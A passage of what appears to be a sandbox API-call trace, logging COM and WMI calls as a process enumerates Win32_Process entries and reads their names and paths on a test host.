[6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0224.536] IUnknown:QueryInterface (in: This=0x5e913f0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5e913f4) returned 0x0 [0224.536] IMarshal:GetUnmarshalClass (in: This=0x5e913f4, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0224.536] IUnknown:Release (This=0x5e913f4) returned 0x3 [0224.536] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0224.536] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0224.536] IUnknown:QueryInterface (in: This=0x5e913f0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0224.536] IUnknown:Release (This=0x5e913f0) returned 0x2 [0224.536] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0224.536] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0224.536] IUnknown:QueryInterface (in: This=0x5e913f0, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5e913f0) returned 0x0 [0224.536] IUnknown:AddRef (This=0x5e913f0) returned 0x4 [0224.537] IUnknown:Release (This=0x5e913f0) returned 0x3 [0224.537] IUnknown:Release (This=0x5e913f0) returned 0x2 [0224.537] CoTaskMemFree (pv=0x5e892d0) [0224.537] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0224.537] IUnknown:AddRef (This=0x5e913f0) returned 0x3 [0224.537] IWbemClassObject:Get (in: This=0x5e913f0, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0224.537] IWbemClassObject:Get (in: This=0x5e913f0, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2392\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0224.537] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2392\"") returned 0x66 [0224.537] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2392\"") returned 0x66 [0224.538] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0224.538] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0224.538] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0224.538] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0224.538] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5e892d0) returned 0x0 [0224.539] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e892d0, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0224.539] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e892d0, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5e8a270) returned 0x0 [0224.539] WbemDefPath:IUnknown:Release (This=0x5e892d0) returned 0x0 [0224.539] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a270, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5e8a270) returned 0x0 [0224.539] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a270, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0224.539] WbemDefPath:IUnknown:AddRef (This=0x5e8a270) returned 0x3 [0224.539] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a270, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0224.540] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a270, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0224.540] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a270, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5e892e0) returned 0x0 [0224.540] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e892e0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0224.540] WbemDefPath:IUnknown:Release (This=0x5e892e0) returned 0x3 [0224.540] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0224.540] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0224.540] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a270, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0224.540] WbemDefPath:IUnknown:Release (This=0x5e8a270) returned 0x2 [0224.540] WbemDefPath:IUnknown:Release (This=0x5e8a270) returned 0x1 [0224.540] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0224.540] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0224.540] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a270, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5e8a270) returned 0x0 [0224.540] WbemDefPath:IUnknown:AddRef (This=0x5e8a270) returned 0x3 [0224.540] WbemDefPath:IUnknown:Release (This=0x5e8a270) returned 0x2 [0224.540] WbemDefPath:IWbemPath:SetText (This=0x5e8a270, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2392\"") returned 0x0 [0224.540] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0224.540] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0224.540] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.540] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0224.541] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0224.541] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.541] IWbemClassObject:Get (in: This=0x5e913f0, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e3bdc*=0, plFlavor=0x26e3be0*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="court camera.exe", varVal2=0x0), pType=0x26e3bdc*=8, plFlavor=0x26e3be0*=0) returned 0x0 [0224.541] SysStringByteLen (bstr="court camera.exe") returned 0x20 [0224.541] SysStringByteLen (bstr="court camera.exe") returned 0x20 [0224.541] IWbemClassObject:Get (in: This=0x5e913f0, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e3bdc*=8, plFlavor=0x26e3be0*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="court camera.exe", varVal2=0x0), pType=0x26e3bdc*=8, plFlavor=0x26e3be0*=0) returned 0x0 [0224.541] SysStringByteLen (bstr="court camera.exe") returned 0x20 [0224.541] SysStringByteLen (bstr="court camera.exe") returned 0x20 [0224.541] CoTaskMemAlloc (cb=0x4) returned 0x5e89310 [0224.541] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e89310, puReturned=0x26dde18 | out: apObjects=0x5e89310*=0x5e92058, puReturned=0x26dde18*=0x1) returned 0x0 [0224.542] IUnknown:QueryInterface (in: This=0x5e92058, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5e92058) returned 0x0 [0224.542] IUnknown:QueryInterface (in: This=0x5e92058, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0224.542] IUnknown:QueryInterface (in: This=0x5e92058, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0224.542] IUnknown:AddRef (This=0x5e92058) returned 0x3 [0224.542] IUnknown:QueryInterface (in: This=0x5e92058, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0224.542] IUnknown:QueryInterface (in: This=0x5e92058, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0224.542] IUnknown:QueryInterface (in: This=0x5e92058, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5e9205c) returned 0x0 [0224.543] IMarshal:GetUnmarshalClass (in: This=0x5e9205c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0224.543] IUnknown:Release (This=0x5e9205c) returned 0x3 [0224.543] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0224.543] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0224.543] IUnknown:QueryInterface (in: This=0x5e92058, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0224.543] IUnknown:Release (This=0x5e92058) returned 0x2 [0224.543] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0224.543] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0224.543] IUnknown:QueryInterface (in: This=0x5e92058, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5e92058) returned 0x0 [0224.543] IUnknown:AddRef (This=0x5e92058) returned 0x4 [0224.543] IUnknown:Release (This=0x5e92058) returned 0x3 [0224.543] IUnknown:Release (This=0x5e92058) returned 0x2 [0224.543] CoTaskMemFree (pv=0x5e89310) [0224.544] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0224.544] IUnknown:AddRef (This=0x5e92058) returned 0x3 [0224.544] IWbemClassObject:Get (in: This=0x5e92058, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0224.544] IWbemClassObject:Get (in: This=0x5e92058, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2400\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0224.544] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2400\"") returned 0x66 [0224.544] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2400\"") returned 0x66 [0224.544] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0224.544] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0224.544] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0224.544] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0224.545] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5e89310) returned 0x0 [0224.545] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e89310, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0224.545] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e89310, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5e8a350) returned 0x0 [0224.545] WbemDefPath:IUnknown:Release (This=0x5e89310) returned 0x0 [0224.545] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a350, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5e8a350) returned 0x0 [0224.546] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a350, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0224.546] WbemDefPath:IUnknown:AddRef (This=0x5e8a350) returned 0x3 [0224.546] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a350, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0224.546] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a350, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0224.546] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a350, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5e89320) returned 0x0 [0224.546] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e89320, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0224.546] WbemDefPath:IUnknown:Release (This=0x5e89320) returned 0x3 [0224.546] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0224.546] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0224.546] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a350, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0224.546] WbemDefPath:IUnknown:Release (This=0x5e8a350) returned 0x2 [0224.546] WbemDefPath:IUnknown:Release (This=0x5e8a350) returned 0x1 [0224.546] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0224.546] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0224.546] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a350, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5e8a350) returned 0x0 [0224.546] WbemDefPath:IUnknown:AddRef (This=0x5e8a350) returned 0x3 [0224.546] WbemDefPath:IUnknown:Release (This=0x5e8a350) returned 0x2 [0224.546] WbemDefPath:IWbemPath:SetText (This=0x5e8a350, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2400\"") returned 0x0 [0224.547] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0224.547] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0224.547] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.547] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0224.547] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0224.547] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.547] IWbemClassObject:Get (in: This=0x5e92058, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e4460*=0, plFlavor=0x26e4464*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="or-finger.exe", varVal2=0x0), pType=0x26e4460*=8, plFlavor=0x26e4464*=0) returned 0x0 [0224.547] SysStringByteLen (bstr="or-finger.exe") returned 0x1a [0224.547] SysStringByteLen (bstr="or-finger.exe") returned 0x1a [0224.547] IWbemClassObject:Get (in: This=0x5e92058, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e4460*=8, plFlavor=0x26e4464*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="or-finger.exe", varVal2=0x0), pType=0x26e4460*=8, plFlavor=0x26e4464*=0) returned 0x0 [0224.547] SysStringByteLen (bstr="or-finger.exe") returned 0x1a [0224.547] SysStringByteLen (bstr="or-finger.exe") returned 0x1a [0224.547] CoTaskMemAlloc (cb=0x4) returned 0x5e89350 [0224.547] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e89350, puReturned=0x26dde18 | out: apObjects=0x5e89350*=0x5e924c8, puReturned=0x26dde18*=0x1) returned 0x0 [0224.548] IUnknown:QueryInterface (in: This=0x5e924c8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5e924c8) returned 0x0 [0224.548] IUnknown:QueryInterface (in: This=0x5e924c8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, 